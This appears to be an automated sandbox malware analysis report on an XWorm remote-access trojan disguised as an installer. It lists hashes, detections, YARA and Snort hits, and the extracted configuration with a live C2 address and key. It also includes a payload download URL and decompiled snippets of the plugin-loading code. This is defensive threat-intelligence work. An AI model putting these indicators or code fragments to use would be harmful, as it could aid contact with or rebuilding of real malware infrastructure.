Edit tour

Windows Analysis Report
33__Installer.exe

Overview

General Information

Sample name:	33__Installer.exe
Analysis ID:	1466312
MD5:	8182ed62008e7526ae7e1f7d702fbcb6
SHA1:	3a3808eefd17f32bc074c739586b6b36c0a06c15
SHA256:	a862efea745fd2c39b097d2e1e1d6961ba4d6f8e5c2823d345c5035b95d44f69
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

33__Installer.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\33__Installer.exe" MD5: 8182ED62008E7526AE7E1F7D702FBCB6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x12072:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Downloads\ind.jpg	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 33__Installer.exe PID: 6556	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.33__Installer.exe.6160000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.33__Installer.exe.6160000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.33__Installer.exe.6160000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.33__Installer.exe.6160000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.4 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:28:04.062990
SID:	2852923
Source Port:	49731
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:27:07.814963
SID:	2853193
Source Port:	49731
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 117.41.184.33 - Destination IP: 192.168.2.4

Timestamp:	07/02/24-19:27:50.409497
SID:	2852874
Source Port:	7000
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 117.41.184.33 - Destination IP: 192.168.2.4

Timestamp:	07/02/24-19:28:04.061886
SID:	2852870
Source Port:	7000
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:24:21.363862
SID:	2855924
Source Port:	49731
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 33__Installer.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 33__Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: 117.41.184.33
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: 7000
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack	String decryptor: USB.exe

Source: 33__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 33__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.4:49731
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.4:49731
Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 117.41.184.33:7000
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 117.41.184.33

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49730

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 117.41.184.33:7000

Source: Joe Sandbox View

ASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN

Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C23910 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,InternetCloseHandle,

0_2_00C23910

Source: global traffic

HTTP traffic detected: GET /330.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 33__Installer.exe	String found in binary or memory: http://guanlix.cn:881/330.ccp
Source: 33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/330.ccp&(
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\33__Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C301C9	0_2_00C301C9
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C359E9	0_2_00C359E9
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C309FC	0_2_00C309FC
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C311B6	0_2_00C311B6
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C36B67	0_2_00C36B67
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C3648B	0_2_00C3648B
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C30DCE	0_2_00C30DCE
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C3065E	0_2_00C3065E
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C37E2F	0_2_00C37E2F
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C35F3A	0_2_00C35F3A
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_0617A010	0_2_0617A010
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_06174E68	0_2_06174E68
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_06177CB0	0_2_06177CB0
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_06175B40	0_2_06175B40
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_0617E920	0_2_0617E920
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_061707A0	0_2_061707A0
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_06174B20	0_2_06174B20

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: String function: 00C2AF90 appears 45 times

Source: 33__Installer.exe, 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe
Source: 33__Installer.exe, 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 33__Installer.exe
Source: 33__Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe

Source: 33__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\33__Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\33__Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH

Source: 33__Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\33__Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 33__Installer.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 33__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 33__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 33__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 33__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 33__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 33__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C345F4

Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C27059 push ecx; ret	0_2_00C2706C
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C26004 push dword ptr [ecx-75h]; iretd	0_2_00C26011
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C316CD push 00000008h; ret	0_2_00C316CF
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C316E9 push cs; ret	0_2_00C316F7
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C316F8 push es; ret	0_2_00C316FF
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C2AFD5 push ecx; ret	0_2_00C2AFE8
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_061770F8 pushad ; iretd	0_2_06177105

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49730

Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
